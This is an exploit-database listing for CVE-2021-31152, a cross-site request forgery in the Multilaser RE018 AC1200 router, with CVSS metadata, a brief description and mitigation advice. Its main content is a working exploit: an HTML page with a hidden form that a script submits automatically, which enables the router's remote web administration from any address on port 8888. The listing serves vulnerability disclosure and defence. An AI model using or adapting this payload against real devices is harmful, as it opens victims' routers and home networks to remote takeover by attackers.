header-logo
Suggest Exploit
vendor:
Router RE018 AC1200
by:
Rodolfo Mariano
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Router RE018 AC1200
Affected Version From: Unknown
Affected Version To: Firmware V02.03.01.45_pt
Patch Exists: YES
Related CWE: CVE-2021-31152
CPE: h:multilaser:re018_ac1200
Metasploit:
Other Scripts:
Platforms Tested:
2021

Multilaser Router RE018 AC1200 – Cross-Site Request Forgery (Enable Remote Access)

This exploit allows an attacker to enable remote access on a Multilaser Router RE018 AC1200 device. By submitting a form with specific parameters, the attacker can change the remote access settings of the router.

Mitigation:

To mitigate this vulnerability, users should update their router firmware to version V02.03.01.45_pt or later. Additionally, it is recommended to disable remote access if it is not required.
Source

Exploit-DB raw data:

# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
# Date: 14/04/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware V02.03.01.45_pt
# CVE: 2021-31152

# Exploit Code:
<html>
	<body>
		<form action="http://192.168.0.1/goform/setSysTools" method="POST">
		    <input name="module4" value="remoteWeb" type="hidden">
		    <input name="remoteWebType" value="any" type="hidden">
		    <input name="remoteWebIP" value="" type="hidden">
		    <input name="remoteWebPort" value="8888" type="hidden">
            <input type="submit" value="Submit request">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>